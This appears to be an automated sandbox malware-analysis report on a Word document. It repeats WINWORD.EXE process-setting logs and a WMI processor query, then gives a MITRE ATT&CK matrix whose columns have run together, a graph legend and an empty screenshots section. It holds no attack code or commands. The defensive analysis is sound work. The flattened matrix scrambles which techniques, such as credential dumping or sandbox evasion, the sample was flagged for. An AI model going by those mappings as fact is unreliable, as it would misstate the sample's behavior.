Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation		Path Interception1
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Exploitation for Client Execution		Boot or Logon Initialization Scripts1
Extra Window Memory Injection		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.